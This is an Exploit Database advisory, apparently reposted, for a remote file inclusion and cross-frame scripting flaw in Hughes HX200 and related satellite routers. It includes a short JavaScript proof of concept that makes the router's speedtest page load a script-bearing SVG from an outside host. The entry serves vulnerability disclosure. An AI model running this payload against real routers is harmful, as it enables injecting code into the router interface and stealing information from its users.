Hughes Satellite Router HX200 v8.3.1.14 – Remote File Inclusion

• Exploit Database
• 16 阅读

• 作者： LiquidWorm
  日期： 2023-04-01
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51190/

• Exploit Title: Hughes Satellite Router HX200 v8.3.1.14 -Remote File Inclusion
  
  
  Vendor: Hughes Network Systems, LLC
  Product web page: https://www.hughes.com
  Affected version: HX200 v8.3.1.14
  HX90 v6.11.0.5
  HX50L v6.10.0.18
  HN9460 v8.2.0.48
  HN7000S v6.9.0.37
  
  Summary: The HX200 is a high-performance satellite router designed to
  provide carrier-grade IP services using dynamically assigned high-bandwidth
  satellite IP connectivity. The HX200 satellite router provides flexible
  Quality of Service (QoS) features that can be tailored to the network
  applications at each individual remote router, such as Adaptive Constant
  Bit Rate (CBR) bandwidth assignment to deliver high-quality, low jitter
  bandwidth for real-time traffic such as Voice over IP (VoIP) or videoconferencing.
  With integrated IP features including RIPv1, RIPv2, BGP, DHCP, NAT/PAT,
  and DNS Server/Relay functionality, together with a high-performance
  satellite modem, the HX200 is a full-featured IP Router with an integrated
  high-performance satellite router. The HX200 enables high- performance
  IP connectivity for a variety of applications including cellular backhaul,
  MPLS extension services, virtual leased line, mobile services and other
  high-bandwidth solutions.
  
  Desc: The router contains a cross-frame scripting via remote file inclusion
  vulnerability that may potentially be exploited by malicious users to compromise
  an affected system. This vulnerability may allow an unauthenticated malicious
  user to misuse frames, include JS/HTML code and steal sensitive information
  from legitimate users of the application.
  
  Tested on: WindWeb/1.0
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2022-5743
  Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5743.php
  
  
  23.12.2022
  
  --
  
  
  snippet:///XFSRFI
  //
  // Hughes Satellite Router RFI/XFS PoC Exploit
  // by lqwrm 2022
  //
  
  //URL http://TARGET/fs/dynaform/speedtest.html
  //Reload target
  //window.location.reload()
  
  console.log("Loading Broadband Satellite Browsing Test");
  
  //Add cross-frame file include (http only)
  AddURLtoList("http://www.zeroscience.mk/pentest/XSS.svg");
  
  console.log("Calling StartTest()");
  StartTest()
  
  //console.log("Calling DoTest()");
  //DoTest()
  
  //Unload weapon
  //document.getElementById("URLList").remove();